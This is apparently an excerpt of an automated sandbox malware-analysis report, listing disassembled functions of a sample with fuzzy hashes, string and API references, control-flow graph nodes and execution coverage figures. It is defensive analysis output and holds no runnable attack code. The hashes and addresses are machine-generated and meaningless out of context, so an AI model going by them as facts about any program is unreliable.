                                                • Instruction Fuzzy Hash: C6E1BF746087429FD72DCF28C884B2ABBE1FB88714F540A1DF6A58B2D2D774D845CB52
                                                Function 011BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Resource at %p, xrefs: 011F7B8E
                                                • RTL: Re-Waiting, xrefs: 011F7BAC
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 011F7B7F
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: e5fa16415fc473cdeb544d2d61a761fc6a135292d1ef25e1a8f008593757cdc4
                                                • Instruction ID: 5c5cfed05af177d0dc334640eb7f457773d92891b0729f6265a0d04c212356ab
                                                • Opcode Fuzzy Hash: e5fa16415fc473cdeb544d2d61a761fc6a135292d1ef25e1a8f008593757cdc4
                                                • Instruction Fuzzy Hash: A54107313097069FD729DE29CC80BAAB7E5EF99710F000A1DFA56D7A80DB31E405CB96
                                                Function 011BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011F728C
                                                Strings
                                                • RTL: Resource at %p, xrefs: 011F72A3
                                                • RTL: Re-Waiting, xrefs: 011F72C1
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 011F7294
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: 7308da1af4438eb1f82457badef00f86faa89cae1540024a96d7b0cd324f46d6
                                                • Instruction ID: 919164c72430e2276c44571b48d1af31ef7705077e998ee417b47e6c1f39d233
                                                • Opcode Fuzzy Hash: 7308da1af4438eb1f82457badef00f86faa89cae1540024a96d7b0cd324f46d6
                                                • Instruction Fuzzy Hash: F141F035608602AFD729DE29CC81FAAB7A5FB94710F10061DFA56AB680DB31E812C7D5
                                                Function 01232300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: 1760823b2f64c3d6d9086654b79ae05be0c998bdbf546a7aba4414aa1039daaa
                                                • Instruction ID: baa5a718e657b6002d7d6f2ef0df309000360e820d6575f1bb6d22cb18514813
                                                • Opcode Fuzzy Hash: 1760823b2f64c3d6d9086654b79ae05be0c998bdbf546a7aba4414aa1039daaa
                                                • Instruction Fuzzy Hash: 42317872A1021ADFDB24DF2DDC40BEEB7F8EF54610F544559E949E3240EB30AA459BA0
                                                Function 011C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction ID: 652ef2780f8fae74a4b97a62eb2a6249f51033804ea5d8b4fafc4c1c20b919dd
                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction Fuzzy Hash: 7291A671E002169BDB2CDF6DC8C16BEBBA5AF64B20F14451EE965E72C0D7B08941CF52
                                                Function 01189126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: 5468bd9e8881d52c6103ec385dfdc3031f41674d3ee416c8cd1f3019e302b637
                                                • Instruction ID: c21129b17db58b0998d3adf72c89bda28b2b6009761f87beaa8973be2c8b94ea
                                                • Opcode Fuzzy Hash: 5468bd9e8881d52c6103ec385dfdc3031f41674d3ee416c8cd1f3019e302b637
                                                • Instruction Fuzzy Hash: 6A812E71D006699BDB39DB94CC44BEEB7B8AF48714F0041DAEA19B7240D7705E84CFA0
                                                Function 0120CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                Download Yara Rule
                                                APIs
                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0120CFBD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: CallFilterFunc@8
                                                • String ID: @$@4Qw@4Qw
                                                • API String ID: 4062629308-2383119779
                                                • Opcode ID: 9dba31561de1362d8fe39cf1a962e30cd376cc1f82cf4dfa5681eb5ff61de56b
                                                • Instruction ID: 7597a56dbe69ea9aada6a7299bd36970c7213a6d3ec8199614ac369c22460d34
                                                • Opcode Fuzzy Hash: 9dba31561de1362d8fe39cf1a962e30cd376cc1f82cf4dfa5681eb5ff61de56b
                                                • Instruction Fuzzy Hash: AC41D671911219DFDB26DFE9C840AAEBBB9FF54B54F00422EEA14DB295D770C801CB61

                                                Execution Graph

                                                Execution Coverage:7.5%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:38
                                                Total number of Limit Nodes:5
                                                execution_graph 30870 176acf0 30874 176ade8 30870->30874 30879 176add8 30870->30879 30871 176acff 30875 176ae1c 30874->30875 30876 176adf9 30874->30876 30875->30871 30876->30875 30877 176b020 GetModuleHandleW 30876->30877 30878 176b04d 30877->30878 30878->30871 30880 176ae1c 30879->30880 30881 176adf9 30879->30881 30880->30871 30881->30880 30882 176b020 GetModuleHandleW 30881->30882 30883 176b04d 30882->30883 30883->30871 30884 176d478 30885 176d47d 30884->30885 30889 176d647 30885->30889 30892 176d658 30885->30892 30886 176d5ab 30890 176d686 30889->30890 30895 176b7d0 30889->30895 30890->30886 30893 176b7d0 DuplicateHandle 30892->30893 30894 176d686 30893->30894 30894->30886 30896 176d6c0 DuplicateHandle 30895->30896 30898 176d756 30896->30898 30898->30890 30899 1764668 30900 176467a 30899->30900 30901 1764686 30900->30901 30903 1764778 30900->30903 30904 176479d 30903->30904 30908 1764878 30904->30908 30912 1764888 30904->30912 30910 17648af 30908->30910 30909 176498c 30909->30909 30910->30909 30916 17644b4 30910->30916 30913 17648af 30912->30913 30914 176498c 30913->30914 30915 17644b4 CreateActCtxA 30913->30915 30915->30914 30917 1765918 CreateActCtxA 30916->30917 30919 17659db 30917->30919

                                                Executed Functions

                                                Function 0176ADE8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0176B03E
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1785088221.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1760000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 6ebfb80a6dd63edc690abbde93838edf3fb90b1329ba24bedb3cf5ebc2d24696
                                                • Instruction ID: 0afe686da7a1f3d91d9aa55dd0d359025928b0922749968f89cd3ab20514fd72
                                                • Opcode Fuzzy Hash: 6ebfb80a6dd63edc690abbde93838edf3fb90b1329ba24bedb3cf5ebc2d24696
                                                • Instruction Fuzzy Hash: 24714770A00B058FD724DF2AD44579AFBF5FF88204F00892DD94AE7A40D775E849CB95
                                                Function 017644B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 59 17644b4-17659d9 CreateActCtxA 62 17659e2-1765a3c 59->62 63 17659db-17659e1 59->63 70 1765a3e-1765a41 62->70 71 1765a4b-1765a4f 62->71 63->62 70->71 72 1765a60 71->72 73 1765a51-1765a5d 71->73 75 1765a61 72->75 73->72 75->75
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 017659C9
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1785088221.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1760000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 4c6574ff3a721724b1d545434ef3458bb5178c89a330a6d1af3bebfe8dfe89b4
                                                • Instruction ID: 17c2c8853d467616c940d4d125fb83a081aedae0623d3d123fea2e89e4f4c4ce
                                                • Opcode Fuzzy Hash: 4c6574ff3a721724b1d545434ef3458bb5178c89a330a6d1af3bebfe8dfe89b4
                                                • Instruction Fuzzy Hash: 4E41D2B1C0071DCFDB24DFA9C884B8EBBB5BF49704F20816AD808AB251DB755945CF90
                                                Function 0176590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 76 176590c-17659d9 CreateActCtxA 78 17659e2-1765a3c 76->78 79 17659db-17659e1 76->79 86 1765a3e-1765a41 78->86 87 1765a4b-1765a4f 78->87 79->78 86->87 88 1765a60 87->88 89 1765a51-1765a5d 87->89 91 1765a61 88->91 89->88 91->91
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 017659C9
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1785088221.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1760000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 4ad452f9645053142f0e5af261269d0517c18382d9376707ad65ebe96e7250f3
                                                • Instruction ID: b31959e1f287578c363d6cc818e99a9c03b163a5474b0baa9057d9685e02be1c
                                                • Opcode Fuzzy Hash: 4ad452f9645053142f0e5af261269d0517c18382d9376707ad65ebe96e7250f3
                                                • Instruction Fuzzy Hash: 4041EFB1D0072ACFDB24DFA9C884BCEBBB5BF89714F20816AD408AB251DB755945CF50
                                                Function 0176B7D0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 92 176b7d0-176d754 DuplicateHandle 95 176d756-176d75c 92->95 96 176d75d-176d77a 92->96 95->96
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0176D686,?,?,?,?,?), ref: 0176D747
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1785088221.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1760000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 55620a876494d645234c5141f4781971bf8364d2d539ee7b1038a7f6ba357e6d
                                                • Instruction ID: a8e0147de1e9775082dfdc946514067088e19177ca3ac7456f607f4ff5756d6b
                                                • Opcode Fuzzy Hash: 55620a876494d645234c5141f4781971bf8364d2d539ee7b1038a7f6ba357e6d
                                                • Instruction Fuzzy Hash: BB21E6B59003499FDB10CF9AD484ADEFBF8FB48310F14841AE954A3350D379A954CFA5
                                                Function 0176D6B9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 99 176d6b9-176d6be 100 176d6c5-176d754 DuplicateHandle 99->100 101 176d6c0-176d6c4 99->101 102 176d756-176d75c 100->102 103 176d75d-176d77a 100->103 101->100 102->103
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0176D686,?,?,?,?,?), ref: 0176D747
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1785088221.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1760000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: eecc8802d840e4aa2b718999aa3da190c97575d71ff0f25e34afae4ab60acb20
                                                • Instruction ID: 6320ee16e03a66ce8671db9911829c46377c1c4b0a2563088c669991154ec8c3
                                                • Opcode Fuzzy Hash: eecc8802d840e4aa2b718999aa3da190c97575d71ff0f25e34afae4ab60acb20
                                                • Instruction Fuzzy Hash: E721E6B59003499FDB10CF9AD884ADEFBF8FB48310F14841AE954A3351D378A944CF65
                                                Function 0176AFD8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 106 176afd8-176b018 108 176b020-176b04b GetModuleHandleW 106->108 109 176b01a-176b01d 106->109 110 176b054-176b068 108->110 111 176b04d-176b053 108->111 109->108 111->110
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0176B03E
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1785088221.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1760000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 98e533585b50ea62279c5c1cb439ed8592f7c1fe4079e133e54d3a0a0fde6ef7
                                                • Instruction ID: 61f7185c30391199e4e0f6c8fd6f74628d7b5518c32ed84be6dac316d0bdb8fd
                                                • Opcode Fuzzy Hash: 98e533585b50ea62279c5c1cb439ed8592f7c1fe4079e133e54d3a0a0fde6ef7
                                                • Instruction Fuzzy Hash: C61113B5D007498FDB10CF9AC444BDEFBF8AB88210F10841AD929A7600D379A545CFA1
                                                Function 05DBAAB0 Relevance: .5, Instructions: 523COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 587 5dbaab0-5dbabf8 600 5dbabfa 587->600 601 5dbabfc-5dbac05 587->601 600->601 602 5dbac09-5dbac12 601->602 603 5dbac07 601->603 604 5dbac1a-5dbac1e 602->604 605 5dbac14 602->605 603->602 607 5dbac20-5dbac23 604->607 608 5dbac25 604->608 605->604 606 5dbad66-5dbad6f 605->606 610 5dbad71 606->610 611 5dbad77-5dbada5 606->611 609 5dbac28-5dbac5f 607->609 608->609 612 5dbac61-5dbac64 609->612 613 5dbac66-5dbac6a 609->613 610->611 614 5dbae95-5dbaed6 call 5db99f0 610->614 615 5dbadac-5dbadb0 611->615 616 5dbada7-5dbadaa 611->616 612->613 617 5dbac6d-5dbac71 612->617 613->617 627 5dbaedd-5dbaf17 614->627 618 5dbadb3-5dbadb7 615->618 616->615 616->618 623 5dbac78 617->623 624 5dbac73-5dbac76 617->624 620 5dbadb9-5dbadbc 618->620 621 5dbadbe 618->621 625 5dbadc1-5dbadf8 620->625 621->625 626 5dbac7b-5dbacb2 623->626 624->626 628 5dbadfa-5dbadfd 625->628 629 5dbadff-5dbae03 625->629 630 5dbacb9-5dbacbd 626->630 631 5dbacb4-5dbacb7 626->631 632 5dbaf19-5dbaf23 627->632 633 5dbaf25 627->633 628->629 634 5dbae06-5dbae34 628->634 629->634 635 5dbacc0-5dbacc4 630->635 631->630 631->635 636 5dbaf27-5dbaf29 632->636 633->636 637 5dbae3b-5dbae3f 634->637 638 5dbae36-5dbae39 634->638 639 5dbaccb 635->639 640 5dbacc6-5dbacc9 635->640 642 5dbaf2f-5dbb01b call 5db9a00 636->642 643 5dbb024-5dbb028 636->643 644 5dbae42-5dbae46 637->644 638->637 638->644 641 5dbacce-5dbad05 639->641 640->641 645 5dbad0c-5dbad10 641->645 646 5dbad07-5dbad0a 641->646 642->643 649 5dbb02a-5dbb034 643->649 650 5dbb036 643->650 647 5dbae48-5dbae4b 644->647 648 5dbae4d 644->648 652 5dbad13-5dbad17 645->652 646->645 646->652 654 5dbae50-5dbae87 647->654 648->654 651 5dbb038-5dbb03a 649->651 650->651 655 5dbb040-5dbb12c call 5db9a00 651->655 656 5dbb135-5dbb1be 651->656 657 5dbad19-5dbad1c 652->657 658 5dbad1e 652->658 659 5dbae89-5dbae8c 654->659 660 5dbae8e-5dbae92 654->660 655->656 677 5dbb200-5dbb256 656->677 678 5dbb1c0-5dbb1cc 656->678 661 5dbad21-5dbad58 657->661 658->661 659->614 659->660 660->614 664 5dbad5a-5dbad5d 661->664 665 5dbad5f-5dbad63 661->665 664->606 664->665 665->606 678->677 681 5dbb1ce-5dbb1e7 678->681 681->677 686 5dbb1e9-5dbb1f8 681->686 686->677
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1820494545.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_5db0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c884ae99eab35d664b4f99641de6307185ef1a8c30ea9379667e9e1861a79702
                                                • Instruction ID: 057980c810408c4216f633b67d7c1d1296ddaa4a5866e31407128ebd278a7d1e
                                                • Opcode Fuzzy Hash: c884ae99eab35d664b4f99641de6307185ef1a8c30ea9379667e9e1861a79702
                                                • Instruction Fuzzy Hash: 2442E330D0461DCFDB15EFA8C8446DCBBB2BF49300F51869AD54A7B264EB709A99CF81
                                                Function 05DBAAA0 Relevance: .5, Instructions: 521COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 687 5dbaaa0-5dbabf8 701 5dbabfa 687->701 702 5dbabfc-5dbac05 687->702 701->702 703 5dbac09-5dbac12 702->703 704 5dbac07 702->704 705 5dbac1a-5dbac1e 703->705 706 5dbac14 703->706 704->703 708 5dbac20-5dbac23 705->708 709 5dbac25 705->709 706->705 707 5dbad66-5dbad6f 706->707 711 5dbad71 707->711 712 5dbad77-5dbada5 707->712 710 5dbac28-5dbac5f 708->710 709->710 713 5dbac61-5dbac64 710->713 714 5dbac66-5dbac6a 710->714 711->712 715 5dbae95-5dbaed6 call 5db99f0 711->715 716 5dbadac-5dbadb0 712->716 717 5dbada7-5dbadaa 712->717 713->714 718 5dbac6d-5dbac71 713->718 714->718 728 5dbaedd-5dbaf17 715->728 719 5dbadb3-5dbadb7 716->719 717->716 717->719 724 5dbac78 718->724 725 5dbac73-5dbac76 718->725 721 5dbadb9-5dbadbc 719->721 722 5dbadbe 719->722 726 5dbadc1-5dbadf8 721->726 722->726 727 5dbac7b-5dbacb2 724->727 725->727 729 5dbadfa-5dbadfd 726->729 730 5dbadff-5dbae03 726->730 731 5dbacb9-5dbacbd 727->731 732 5dbacb4-5dbacb7 727->732 733 5dbaf19-5dbaf23 728->733 734 5dbaf25 728->734 729->730 735 5dbae06-5dbae34 729->735 730->735 736 5dbacc0-5dbacc4 731->736 732->731 732->736 737 5dbaf27-5dbaf29 733->737 734->737 738 5dbae3b-5dbae3f 735->738 739 5dbae36-5dbae39 735->739 740 5dbaccb 736->740 741 5dbacc6-5dbacc9 736->741 743 5dbaf2f-5dbb01b call 5db9a00 737->743 744 5dbb024-5dbb028 737->744 745 5dbae42-5dbae46 738->745 739->738 739->745 742 5dbacce-5dbad05 740->742 741->742 746 5dbad0c-5dbad10 742->746 747 5dbad07-5dbad0a 742->747 743->744 750 5dbb02a-5dbb034 744->750 751 5dbb036 744->751 748 5dbae48-5dbae4b 745->748 749 5dbae4d 745->749 753 5dbad13-5dbad17 746->753 747->746 747->753 755 5dbae50-5dbae87 748->755 749->755 752 5dbb038-5dbb03a 750->752 751->752 756 5dbb040-5dbb12c call 5db9a00 752->756 757 5dbb135-5dbb1be 752->757 758 5dbad19-5dbad1c 753->758 759 5dbad1e 753->759 760 5dbae89-5dbae8c 755->760 761 5dbae8e-5dbae92 755->761 756->757 778 5dbb200-5dbb256 757->778 779 5dbb1c0-5dbb1cc 757->779 762 5dbad21-5dbad58 758->762 759->762 760->715 760->761 761->715 765 5dbad5a-5dbad5d 762->765 766 5dbad5f-5dbad63 762->766 765->707 765->766 766->707 779->778 782 5dbb1ce-5dbb1e7 779->782 782->778 787 5dbb1e9-5dbb1f8 782->787 787->778
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1820494545.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_5db0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ac13e540144422c82f00ae45ae4bfea1d884e392ff7297319595fdad91356a2c
                                                • Instruction ID: b4e01ba226a0076782bf92ab97c4059f3e0e7e85c83abf829da5e00c1519ce1a
                                                • Opcode Fuzzy Hash: ac13e540144422c82f00ae45ae4bfea1d884e392ff7297319595fdad91356a2c
                                                • Instruction Fuzzy Hash: D742E430D0461DCFDB15EFA8C8446DCBBB2BF49300F51869AD54A7B264EB709A98CF81
                                                Function 05DB7498 Relevance: .3, Instructions: 336COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 788 5db7498-5db91c8 791 5db91ce-5db91d9 788->791 792 5db91c9 call 5db8c68 788->792 793 5db91df-5db91ed 791->793 794 5db9381-5db93fd 791->794 792->791 798 5db9353-5db937a 793->798 799 5db91f3-5db9240 call 5db8c74 call 5db8ea4 793->799 801 5db93ff-5db9405 794->801 802 5db9415-5db9419 794->802 798->794 829 5db92b0-5db92cf 799->829 830 5db9246-5db9260 call 5dba1d0 799->830 804 5db9409-5db940b 801->804 805 5db9407 801->805 806 5db941b-5db9437 802->806 807 5db948e-5db9493 802->807 804->802 805->802 816 5db9439-5db943f 806->816 817 5db944f-5db9454 806->817 810 5db9495-5db94a3 call 5db8c74 807->810 811 5db94a4-5db94af 807->811 825 5db9587 call 5db95a0 811->825 826 5db94b5-5db94b9 811->826 823 5db9443-5db9445 816->823 824 5db9441 816->824 820 5db947e-5db948d call 5db8ee8 817->820 821 5db9456-5db9477 call 5db8ed8 817->821 821->820 823->817 824->817 832 5db958d-5db959d call 5db8ee8 825->832 826->825 828 5db94bf-5db94da 826->828 843 5db94dc-5db94e2 828->843 844 5db94f2-5db94f4 828->844 835 5db92d1-5db92e3 call 5db8ea4 829->835 851 5db9266-5db92ae 830->851 835->798 847 5db94e6-5db94e8 843->847 848 5db94e4 843->848 849 5db94f6-5db94f9 844->849 850 5db9534-5db953f 844->850 847->844 848->844 849->850 852 5db94fb-5db9517 849->852 854 5db9546-5db954a 850->854 851->835 859 5db9519-5db951f 852->859 860 5db952f-5db9532 852->860 855 5db954c-5db9570 call 5db8ed8 854->855 856 5db9577-5db9586 call 5db8ee8 854->856 855->856 863 5db9523-5db9525 859->863 864 5db9521 859->864 860->854 863->860 864->860
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1820494545.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_5db0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 340b5fe3ae65adfc4ff75517152577d0af39caa95aa9dc71e18e0720c52f2329
                                                • Instruction ID: 654ad39d40c24ec3fc430ac03b0cb5deb6524c192826038e2039f7d303101862
                                                • Opcode Fuzzy Hash: 340b5fe3ae65adfc4ff75517152577d0af39caa95aa9dc71e18e0720c52f2329
                                                • Instruction Fuzzy Hash: D1B1CA71E05209CFEB20DFA5C8946EEBBF6FF88300F20416AC606A7245DB719951CB95
                                                Function 05DB5EAC Relevance: .2, Instructions: 220COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1078 5db5eac-5db5f22 call 5db5560 1084 5db5f88-5db5fb4 1078->1084 1085 5db5f24-5db5f26 1078->1085 1086 5db5fbb-5db5fc3 1084->1086 1085->1086 1087 5db5f2c-5db5f38 1085->1087 1092 5db5fca-5db6032 1086->1092 1087->1092 1093 5db5f3e-5db5f87 call 5db556c 1087->1093 1109 5db6039-5db6105 1092->1109 1110 5db6034-5db6038 1092->1110 1113 5db610b-5db6119 1109->1113 1110->1109 1114 5db611b-5db6121 1113->1114 1115 5db6122-5db6168 1113->1115 1114->1115 1120 5db616a-5db616d 1115->1120 1121 5db6175 1115->1121 1120->1121 1122 5db6176 1121->1122 1122->1122
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1820494545.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_5db0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 54bed9d015ca39ef5ee4ff1147271c0bd18464670f30aaecb46044c34b2796a0
                                                • Instruction ID: 0086d772540c6d782f591724a8a4ec8a9b41e04dde4782dac4df7b5a97852106
                                                • Opcode Fuzzy Hash: 54bed9d015ca39ef5ee4ff1147271c0bd18464670f30aaecb46044c34b2796a0
                                                • Instruction Fuzzy Hash: 3D814C70E003199FDB14DFA9D8946EEBBF6FF89300F14852AE406AB350DB749945CBA1
                                                Function 05DBA508 Relevance: .2, Instructions: 207COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1820494545.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_5db0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 16313abe8b1b5d3751cf2a386848dee32973e98d54279ae5e141c56699614fca
                                                • Instruction ID: c1d3af04befb66176d30d5ea86335b392c4dbaa2fecdad53e4d1a46077daecbe
                                                • Opcode Fuzzy Hash: 16313abe8b1b5d3751cf2a386848dee32973e98d54279ae5e141c56699614fca
                                                • Instruction Fuzzy Hash: 33818070A14609DFDB15EF68D8886ECBBF7FF44300F51406AE442AB2A4EBB0DA55CB41
                                                Function 05DBA4F8 Relevance: .2, Instructions: 201COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1820494545.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_5db0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d425ea46d48deb8317334f1f201b3670aa64cc7e4482dada5e6408a5a967456d
                                                • Instruction ID: e1a20e25a7d755223bda070103ba703d01397002e5a391421ff672d55332739c
                                                • Opcode Fuzzy Hash: d425ea46d48deb8317334f1f201b3670aa64cc7e4482dada5e6408a5a967456d
                                                • Instruction Fuzzy Hash: 75716D70A14619DFEB15EF68D8586ECBBB3FF44200F10416BE443A72A4EBB09A55CB81
                                                Function 05DB61B8 Relevance: .2, Instructions: 152COMMON
                                                Download Yara Rule
                                                Memory Dump Source
